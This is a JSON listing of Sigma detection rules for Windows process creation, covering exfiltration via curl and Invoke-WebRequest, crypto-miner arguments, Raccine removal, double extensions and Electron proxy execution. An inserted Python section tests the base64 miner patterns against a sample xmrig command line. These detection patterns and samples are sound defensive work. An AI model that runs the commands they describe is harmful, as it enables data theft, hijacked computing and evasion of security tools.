selection_tools_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: 'copy '\n    selection_tools_pwsh:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - 'copy-item'\n            - ' copy '\n            - 'cpi '\n            - ' cp '\n    selection_tools_other:\n        - Image|endswith:\n              - '\\robocopy.exe'\n              - '\\xcopy.exe'\n        - OriginalFileName:\n              - 'robocopy.exe'\n              - 'XCOPY.EXE'\n    selection_target_path:\n        CommandLine|contains:\n            - '\\System32'\n            - '\\SysWOW64'\n            - '\\WinSxS'\n    selection_target_lolbin:\n        CommandLine|contains:\n            # Note: add more binaries to increase coverage\n            - 
'\\bitsadmin.exe'\n            - '\\calc.exe'\n            - '\\certutil.exe'\n            - '\\cmdl32.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n            - '\\ie4uinit.exe'\n    condition: 1 of selection_tools_* and all of selection_target_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_crypto_mining_monero.yml",
    "content": "title: Potential Crypto Mining Activity\nid: 66c3b204-9f88-4d0a-a7f7-8a57d521ca55\nstatus: stable\ndescription: Detects command line parameters or strings often used by crypto miners\nreferences:\n    - https://www.poolwatch.io/coin/monero\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-26\nmodified: 2023-02-13\ntags:\n    - attack.impact\n    - attack.t1496\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' --cpu-priority='\n            - '--donate-level=0'\n            - ' -o pool.'\n            - ' --nicehash'\n            - ' --algo=rx/0 '\n            - 'stratum+tcp://'\n            - 'stratum+udp://'\n            # base64 encoded: --donate-level=\n            - 'LS1kb25hdGUtbGV2ZWw9'\n            - '0tZG9uYXRlLWxldmVsP'\n            - 'tLWRvbmF0ZS1sZXZlbD'\n            # base64 encoded: stratum+tcp:// and stratum+udp://\n            - 'c3RyYXR1bSt0Y3A6Ly'\n            - 'N0cmF0dW0rdGNwOi8v'\n            - 'zdHJhdHVtK3RjcDovL'\n            - 'c3RyYXR1bSt1ZHA6Ly'\n            - 'N0cmF0dW0rdWRwOi8v'\n            - 'zdHJhdHVtK3VkcDovL'\n    filter:\n        CommandLine|contains:\n            - ' pool.c '\n            - ' pool.o '\n            - 'gcc -'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use of crypto miners\n    - Some build frameworks\nlevel: high\n"
  },
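The nine base64 strings in the "Potential Crypto Mining Activity" rule are the three alignment-dependent encodings of each keyword: base64 turns 3 bytes into 4 characters, so the encoding of a substring depends on its byte offset modulo 3. The following added example (written for this page, not code from the rule set) derives those fragments from the keywords and checks them against the rule, then shows with constructed command lines what the fragments do and do not catch; in particular, a PowerShell `-EncodedCommand` payload is base64 of UTF-16LE text, so these ASCII-derived fragments never appear in it.

```python
"""Added example, not part of the SigmaHQ rule set: derive the base64 'rotations'
the Potential Crypto Mining Activity rule lists for --donate-level= and the
stratum+tcp:// / stratum+udp:// prefixes, and show what they do and do not catch."""
import base64

# The fragments exactly as listed in the rule, keyed by the keyword they encode.
RULE_FRAGMENTS = {
    b"--donate-level=": ["LS1kb25hdGUtbGV2ZWw9", "0tZG9uYXRlLWxldmVsP", "tLWRvbmF0ZS1sZXZlbD"],
    b"stratum+tcp://": ["c3RyYXR1bSt0Y3A6Ly", "N0cmF0dW0rdGNwOi8v", "zdHJhdHVtK3RjcDovL"],
    b"stratum+udp://": ["c3RyYXR1bSt1ZHA6Ly", "N0cmF0dW0rdWRwOi8v", "zdHJhdHVtK3VkcDovL"],
}


def base64_rotations(keyword):
    """Return the three substrings of base64(keyword) that survive in
    base64(anything + keyword + anything), one per byte offset modulo 3.

    Each base64 character carries 6 bits that may straddle two bytes. Prepending
    0, 1 or 2 dummy bytes moves the keyword to each alignment; every character that
    shares bits with the dummy prefix is dropped, and so is the final character
    whenever it would also carry bits of whatever follows the keyword.
    """
    rotations = []
    for shift in range(3):
        enc = base64.b64encode(b"\x00" * shift + keyword).decode().rstrip("=")
        lead = (shift * 8 + 5) // 6                            # chars touched by prefix bits
        trail = 1 if ((shift + len(keyword)) * 8) % 6 else 0   # last char shares bits
        rotations.append(enc[lead:len(enc) - trail])
    return rotations


def fragment_hit(command_line, keyword):
    """Mirror the rule's CommandLine|contains check (case-insensitive, as in Sigma)."""
    cl = command_line.lower()
    return any(frag.lower() in cl for frag in base64_rotations(keyword))


def demo():
    """Constructed command lines. An ASCII base64 blob, as a cmd/bash one-liner would
    carry it, hits because one of the three rotations always lines up; the same flag
    inside a PowerShell -EncodedCommand payload does not, because that payload is
    base64 of UTF-16LE and the interleaved NUL bytes change every encoded character."""
    ascii_blob = base64.b64encode(
        b"xmrig -o pool.example.invalid:3333 --donate-level=0 --cpu-priority=5").decode()
    utf16_blob = base64.b64encode(
        "xmrig -o pool.example.invalid:3333 --donate-level=0".encode("utf-16le")).decode()
    return (fragment_hit("cmd /c echo " + ascii_blob + " > m.b64", b"--donate-level="),
            fragment_hit("powershell -EncodedCommand " + utf16_blob, b"--donate-level="))
```

`base64_rotations` reproduces all nine strings in the rule, which is a quick way to regenerate them if more keywords are added. The `demo()` result, `(True, False)`, is the caveat to keep in mind when tuning this rule: the encoded patterns cover base64 of single-byte text only, so encoded PowerShell (`-EncodedCommand`, `-enc`) needs separate UTF-16LE-derived fragments or a decode-then-match step.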
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml",
    "content": "title: Potential Data Exfiltration Activity Via CommandLine Tools\nid: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab\nstatus: test\ndescription: Detects the use of various CLI utilities exfiltrating data via web requests\nreferences:\n    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-02\nmodified: 2025-10-19\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_iwr:\n        Image|endswith:\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\cmd.exe'\n        CommandLine|contains:\n            - 'curl '\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - 'irm '\n            - 'iwr '\n            - 'wget '\n        CommandLine|contains|all:\n            - ' -ur' # Shortest possible version of the -uri flag\n            - ' -me' # Shortest possible version of the -method flag\n            - ' -b'\n            - ' POST '\n    selection_curl:\n        Image|endswith: '\\curl.exe'\n        CommandLine|contains: '--ur' # Shortest possible version of the --uri flag\n    selection_curl_data:\n        CommandLine|contains:\n            - ' -d ' # Shortest possible version of the --data flag\n            - ' --data '\n    selection_wget:\n        Image|endswith: '\\wget.exe'\n        CommandLine|contains:\n            - '--post-data'\n            - '--post-file'\n    payloads:\n        - CommandLine|re:\n              - 'net\\s+view'\n              - 'sc\\s+query'\n        - CommandLine|contains:\n              - 'Get-Content'\n              - 'GetBytes'\n              - 'hostname'\n              - 'ifconfig'\n              - 'ipconfig'\n              - 'netstat'\n              - 'nltest'\n              - 'qprocess'\n      
        - 'systeminfo'\n              - 'tasklist'\n              - 'ToBase64String'\n              - 'whoami'\n        - CommandLine|contains|all:\n              - 'type '\n              - ' > '\n              - ' C:\\'\n    condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml",
    "content": "title: Raccine Uninstall\nid: a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc\nstatus: test\ndescription: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.\nreferences:\n    - https://github.com/Neo23x0/Raccine\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-21\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains|all:\n            - 'taskkill '\n            - 'RaccineSettings.exe'\n    selection2:\n        CommandLine|contains|all:\n            - 'reg.exe'\n            - 'delete'\n            - 'Raccine Tray'\n    selection3:\n        CommandLine|contains|all:\n            - 'schtasks'\n            - '/DELETE'\n            - 'Raccine Rules Updater'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate deinstallation by administrative staff\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_double_extension.yml",
    "content": "title: Suspicious Double Extension File Execution\nid: 1cdd9a09-06c9-4769-99ff-626e2b3991b8\nrelated:\n    - id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c # ParentImage/ParentCommandLine\n      type: similar\nstatus: stable\ndescription: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns\nreferences:\n    - https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html\n    - https://twitter.com/blackorbird/status/1140519090961825792\n    - https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\nauthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-06-26\nmodified: 2025-05-30\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '      .exe'\n            - '______.exe'\n            - '.doc.exe'\n            - '.doc.js'\n            - '.docx.exe'\n            - '.docx.js'\n            - '.gif.exe'\n            - '.jpeg.exe'\n            - '.jpg.exe'\n            - '.mkv.exe'\n            - '.mov.exe'\n            - '.mp3.exe'\n            - '.mp4.exe'\n            - '.pdf.exe'\n            - '.pdf.js'\n            - '.png.exe'\n            - '.ppt.exe'\n            - '.ppt.js'\n            - '.pptx.exe'\n            - '.pptx.js'\n            - '.rtf.exe'\n            - '.rtf.js'\n            - '.svg.exe'\n            - '.txt.exe'\n            - '.txt.js'\n            - '.xls.exe'\n            - '.xls.js'\n            - '.xlsx.exe'\n            - '.xlsx.js'\n            - '⠀⠀⠀⠀⠀⠀.exe' # Unicode Space Character: Braille Pattern Blank (Unicode: U+2800)\n        CommandLine|contains:\n            - '      .exe'\n            - '______.exe'\n            - '.doc.exe'\n         
   - '.doc.js'\n            - '.docx.exe'\n            - '.docx.js'\n            - '.gif.exe'\n            - '.jpeg.exe'\n            - '.jpg.exe'\n            - '.mkv.exe'\n            - '.mov.exe'\n            - '.mp3.exe'\n            - '.mp4.exe'\n            - '.pdf.exe'\n            - '.pdf.js'\n            - '.png.exe'\n            - '.ppt.exe'\n            - '.ppt.js'\n            - '.pptx.exe'\n            - '.pptx.js'\n            - '.rtf.exe'\n            - '.rtf.js'\n            - '.svg.exe'\n            - '.txt.exe'\n            - '.txt.js'\n            - '.xls.exe'\n            - '.xls.js'\n            - '.xlsx.exe'\n            - '.xlsx.js'\n            - '⠀⠀⠀⠀⠀⠀.exe' # Unicode Space Character: Braille Pattern Blank (Unicode: U+2800)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml",
    "content": "title: Suspicious Parent Double Extension File Execution\nid: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c\nrelated:\n    - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 # Image/CommandLine\n      type: derived\nstatus: test\ndescription: Detect execution of suspicious double extension files in ParentCommandLine\nreferences:\n    - https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-06\nmodified: 2023-02-28\ntags:\n    - attack.defense-evasion\n    - attack.t1036.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - ParentImage|endswith:\n              - '.doc.lnk'\n              - '.docx.lnk'\n              - '.xls.lnk'\n              - '.xlsx.lnk'\n              - '.ppt.lnk'\n              - '.pptx.lnk'\n              - '.rtf.lnk'\n              - '.pdf.lnk'\n              - '.txt.lnk'\n              - '.doc.js'\n              - '.docx.js'\n              - '.xls.js'\n              - '.xlsx.js'\n              - '.ppt.js'\n              - '.pptx.js'\n              - '.rtf.js'\n              - '.pdf.js'\n              - '.txt.js'\n        - ParentCommandLine|contains:\n              - '.doc.lnk'\n              - '.docx.lnk'\n              - '.xls.lnk'\n              - '.xlsx.lnk'\n              - '.ppt.lnk'\n              - '.pptx.lnk'\n              - '.rtf.lnk'\n              - '.pdf.lnk'\n              - '.txt.lnk'\n              - '.doc.js'\n              - '.docx.js'\n              - '.xls.js'\n              - '.xlsx.js'\n              - '.ppt.js'\n              - '.pptx.js'\n              - '.rtf.js'\n              - '.pdf.js'\n              - '.txt.js'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml",
    "content": "title: Suspicious Download from Office Domain\nid: 00d49ed5-4491-4271-a8db-650a4ef6f8c1\nstatus: test\ndescription: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents\nreferences:\n    - https://twitter.com/an0n_r0/status/1474698356635193346?s=12\n    - https://twitter.com/mrd0x/status/1475085452784844803?s=12\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-27\nmodified: 2022-08-02\ntags:\n    - attack.command-and-control\n    - attack.resource-development\n    - attack.t1105\n    - attack.t1608\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_download:\n        - Image|endswith:\n              - '\\curl.exe'\n              - '\\wget.exe'\n        - CommandLine|contains:\n              - 'Invoke-WebRequest'\n              - 'iwr '\n              - 'curl '\n              - 'wget '\n              - 'Start-BitsTransfer'\n              - '.DownloadFile('\n              - '.DownloadString('\n    selection_domains:\n        CommandLine|contains:\n            - 'https://attachment.outlook.live.net/owa/'\n            - 'https://onenoteonlinesync.onenote.com/onenoteonlinesync/'\n    condition: all of selection_*\nfalsepositives:\n    - Scripts or tools that download attachments from these domains (OneNote, Outlook 365)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml",
    "content": "title: DumpStack.log Defender Evasion\nid: 4f647cfa-b598-4e12-ad69-c68dd16caef8\nstatus: test\ndescription: Detects the use of the filename DumpStack.log to evade Microsoft Defender\nreferences:\n    - https://twitter.com/mrd0x/status/1479094189048713219\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-06\nmodified: 2022-06-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\DumpStack.log'\n    selection_download:\n        CommandLine|contains: ' -o DumpStack.log'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml",
    "content": "title: Always Install Elevated MSI Spawned Cmd And Powershell\nid: 1e53dd56-8d83-4eb4-a43e-b790a05510aa\nstatus: test\ndescription: Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg\nauthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community\ndate: 2020-10-13\nmodified: 2022-10-20\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_parent:\n        ParentImage|contains|all:\n            - '\\Windows\\Installer\\'\n            - 'msi'\n        ParentImage|endswith: 'tmp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml",
    "content": "title: Suspicious Electron Application Child Processes\nid: f26eb764-fd89-464b-85e2-dc4a8e6e77b8\nrelated:\n    - id: 378a05d8-963c-46c9-bcce-13c7657eac99\n      type: similar\nstatus: test\ndescription: |\n    Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of \".asar\" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)\nreferences:\n    - https://taggart-tech.com/quasar-electron/\n    - https://github.com/mttaggart/quasar\n    - https://positive.security/blog/ms-officecmd-rce\n    - https://lolbas-project.github.io/lolbas/Binaries/Msedge/\n    - https://lolbas-project.github.io/lolbas/Binaries/Teams/\n    - https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/\n    - https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-21\nmodified: 2024-07-12\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            # Add more electron based app to the list\n            - '\\chrome.exe' # Might require additional tuning\n            - '\\discord.exe'\n            - '\\GitHubDesktop.exe'\n            - '\\keybase.exe'\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n            - '\\msteams.exe'\n            - '\\slack.exe'\n            - '\\teams.exe'\n            # - '\\code.exe' # Prone to a lot of FPs. 
Requires an additional baseline\n    selection_child_image:\n        Image|endswith:\n            # Add more suspicious/unexpected paths\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\whoami.exe'\n            - '\\wscript.exe'\n    selection_child_paths:\n        Image|contains:\n            # Add more suspicious/unexpected paths\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n    filter_optional_discord:\n        ParentImage|endswith: '\\Discord.exe'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: '\\NVSMI\\nvidia-smi.exe'\n    condition: selection_parent and 1 of selection_child_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\n# Increase the level once FP rate is reduced (see status)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml",
    "content": "title: Potentially Suspicious Electron Application CommandLine\nid: 378a05d8-963c-46c9-bcce-13c7657eac99\nrelated:\n    - id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8\n      type: similar\nstatus: test\ndescription: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.\nreferences:\n    - https://positive.security/blog/ms-officecmd-rce\n    - https://lolbas-project.github.io/lolbas/Binaries/Teams/\n    - https://lolbas-project.github.io/lolbas/Binaries/Msedge/\n    - https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/\n    - https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf\n    - https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-05\nmodified: 2023-11-09\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              # Add more electron based app to the list\n              - '\\chrome.exe'\n              - '\\code.exe'\n              - '\\discord.exe'\n              - '\\GitHubDesktop.exe'\n              - '\\keybase.exe'\n              - '\\msedge_proxy.exe'\n              - '\\msedge.exe'\n              - '\\msedgewebview2.exe'\n              - '\\msteams.exe'\n              - '\\slack.exe'\n              - '\\Teams.exe'\n        - OriginalFileName:\n              # Add more electron based app to the list\n              - 'chrome.exe'\n              - 'code.exe'\n              - 'discord.exe'\n              - 'GitHubDesktop.exe'\n              - 'keybase.exe'\n              - 'msedge_proxy.exe'\n              - 'msedge.exe'\n              - 'msedgewebview2.exe'\n              - 'msteams.exe'\n              - 'slack.exe'\n              - 'Teams.exe'\n    selection_cli:\n       
 CommandLine|contains:\n            - '--browser-subprocess-path'\n            - '--gpu-launcher'\n            - '--renderer-cmd-prefix'\n            - '--utility-cmd-prefix'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage for debugging purposes\n# Increase the level once FP rate is known better (see status)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml",
    "content": "title: Elevated System Shell Spawned From Uncommon Parent Location\nid: 178e615d-e666-498b-9630-9ed363038101\nrelated:\n    - id: 61065c72-5d7d-44ef-bf41-6a36684b545f\n      type: similar\nstatus: test\ndescription: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.\nreferences:\n    - https://github.com/Wh04m1001/SysmonEoP\nauthor: frack113, Tim Shelton (update fp)\ndate: 2022-12-05\nmodified: 2025-03-06\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_shell:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\powershell_ise.exe'\n              - '\\pwsh.exe'\n              - '\\cmd.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'powershell_ise.EXE'\n              - 'pwsh.dll'\n              - 'Cmd.Exe'\n    selection_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        LogonId: '0x3e7'\n    filter_main_generic:\n        # Example 1:\n        #   C:\\Program Files\\erl-23.2\\erts-11.1.4\\bin\\erl.exe\" -service_event ErlSrv_RabbitMQ -nohup -sname rabbit@localhost -s rabbit boot -boot start_sasl +W w +MBas ageffcbf +MHas ageffcbf +MBlmbcs 512 +MHlmbcs 512 +MMmcs 30 +P 1048576 +t 5000000 +stbt db +zdbbl 128000 +sbwt none +sbwtdcpu none +sbwtdio none -kernel inet_dist_listen_min 25672 -kernel inet_dist_listen_max 25672 -lager crash_log false -lager handlers []\n        # Example 2:\n        #   ParentImage: C:\\Program Files (x86)\\Varonis\\DatAdvantage\\GridCollector\\VrnsRealTimeAlertsSvc.exe\" /appid 000000ad-cb03-500b-9459-c46d000000ad\n        #   CommandLine: C:\\Windows\\system32\\cmd.exe /c C:\\Program Files 
\"(x86)\\Varonis\\DatAdvantage\\GridCollector\\handle_scopes.cmd C:\\Collector\" Working Share\\VaronisWorkDirectoryCollector\n        ParentImage|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\ProgramData\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\Temp\\' # Installers\n            - ':\\Windows\\WinSxS\\'\n    filter_optional_manageengine:\n        # Example:\n        #   ParentImage: C:/ManageEngine/ADManager Plus/pgsql/bin/postgres.exe\" --forkarch 5380\n        #   CommandLine: C:\\Windows\\system32\\cmd.exe /c \"IF EXIST archive.bat (archive.bat pg_wal\\000000010000008E000000EA 000000010000008E000000EA)\n        ParentImage|endswith: ':\\ManageEngine\\ADManager Plus\\pgsql\\bin\\postgres.exe'\n        Image|endswith: '\\cmd.exe'\n    filter_optional_asgard:\n        CommandLine|contains: ':\\WINDOWS\\system32\\cmd.exe /c \"'\n        CurrentDirectory|contains: ':\\WINDOWS\\Temp\\asgard2-agent\\'\n    filter_optional_ibm_spectrumprotect:\n        ParentImage|contains: ':\\IBM\\SpectrumProtect\\webserver\\scripts\\'\n        CommandLine|contains: ':\\IBM\\SpectrumProtect\\webserver\\scripts\\'\n    filter_main_parent_null:\n        ParentImage: null\n    filter_main_parent_empty:\n        ParentImage:\n            - ''\n            - '-'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Some legitimate applications may spawn shells from uncommon parent locations. Apply additional filters and perform an initial baseline before deploying.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_embed_exe_lnk.yml",
    "content": "title: Hidden Powershell in Link File Pattern\nid: 30e92f50-bb5a-4884-98b5-d20aa80f3d7a\nstatus: test\ndescription: Detects events that appear when a user click on a link file with a powershell command in it\nreferences:\n    - https://www.x86matthew.com/view_post?id=embed_exe_lnk\nauthor: frack113\ndate: 2022-02-06\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage: C:\\Windows\\explorer.exe\n        Image: C:\\Windows\\System32\\cmd.exe\n        CommandLine|contains|all:\n            - 'powershell'\n            - '.lnk'\n    condition: selection\nfalsepositives:\n    - Legitimate commands in .lnk files\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_1.yml",
    "content": "title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1\nid: 4a30ac0c-b9d6-4e01-b71a-5f851bbf4259\nstatus: test\ndescription: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.\nauthor: '@Kostastsale, TheDFIRReport'\nreferences:\n    - Internal Research\ntags:\n    - attack.defense-evasion\ndate: 2022-12-05\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '😀'\n            - '😃'\n            - '😄'\n            - '😁'\n            - '😆'\n            - '😅'\n            - '😂'\n            - '🤣'\n            - '🥲'\n            - '🥹'\n            - '☺️'\n            - '😊'\n            - '😇'\n            - '🙂'\n            - '🙃'\n            - '😉'\n            - '😌'\n            - '😍'\n            - '🥰'\n            - '😘'\n            - '😗'\n            - '😙'\n            - '😚'\n            - '😋'\n            - '😛'\n            - '😝'\n            - '😜'\n            - '🤪'\n            - '🤨'\n            - '🧐'\n            - '🤓'\n            - '😎'\n            - '🥸'\n            - '🤩'\n            - '🥳'\n            - '😏'\n            - '😒'\n            - '😞'\n            - '😔'\n            - '😟'\n            - '😕'\n            - '🙁'\n            - '☹️'\n            - '😣'\n            - '😖'\n            - '😫'\n            - '😩'\n            - '🥺'\n            - '😢'\n            - '😭'\n            - '😮‍💨'\n            - '😤'\n            - '😠'\n            - '😡'\n            - '🤬'\n            - '🤯'\n            - '😳'\n            - '🥵'\n            - '🥶'\n            - '😱'\n            - '😨'\n            - '😰'\n            - '😥'\n            - '😓'\n            - '🫣'\n            - '🤗'\n            - '🫡'\n            - '🤔'\n            - '🫢'\n            - '🤭'\n            - '🤫'\n            - '🤥'\n            - '😶'\n            - '😶‍🌫️'\n            - '😐'\n            - '😑'\n            - 
'😬'\n            - '🫠'\n            - '🙄'\n            - '😯'\n            - '😦'\n            - '😧'\n            - '😮'\n            - '😲'\n            - '🥱'\n            - '😴'\n            - '🤤'\n            - '😪'\n            - '😵'\n            - '😵‍💫'\n            - '🫥'\n            - '🤐'\n            - '🥴'\n            - '🤢'\n            - '🤮'\n            - '🤧'\n            - '😷'\n            - '🤒'\n            - '🤕'\n            - '🤑'\n            - '🤠'\n            - '😈'\n            - '👿'\n            - '👹'\n            - '👺'\n            - '🤡'\n            - '💩'\n            - '👻'\n            - '💀'\n            - '☠️'\n            - '👽'\n            - '👾'\n            - '🤖'\n            - '🎃'\n            - '😺'\n            - '😸'\n            - '😹'\n            - '😻'\n            - '😼'\n            - '😽'\n            - '🙀'\n            - '😿'\n            - '😾'\n            - '👋'\n            - '🤚'\n            - '🖐'\n            - '✋'\n            - '🖖'\n            - '👌'\n            - '🤌'\n            - '🤏'\n            - '✌️'\n            - '🤞'\n            - '🫰'\n            - '🤟'\n            - '🤘'\n            - '🤙'\n            - '🫵'\n            - '🫱'\n            - '🫲'\n            - '🫳'\n            - '🫴'\n            - '👈'\n            - '👉'\n            - '👆'\n            - '🖕'\n            - '👇'\n            - '☝️'\n            - '👍'\n            - '👎'\n            - '✊'\n            - '👊'\n            - '🤛'\n            - '🤜'\n            - '👏'\n            - '🫶'\n            - '🙌'\n            - '👐'\n            - '🤲'\n            - '🤝'\n            - '🙏'\n            - '✍️'\n            - '💪'\n            - '🦾'\n            - '🦵'\n            - '🦿'\n            - '🦶'\n            - '👣'\n            - '👂'\n            - '🦻'\n            - '👃'\n            - '🫀'\n            - '🫁'\n            - '🧠'\n            - '🦷'\n            - '🦴'\n            - '👀'\n            - '👁'\n            - '👅'\n            - '👄'\n            - '🫦'\n            
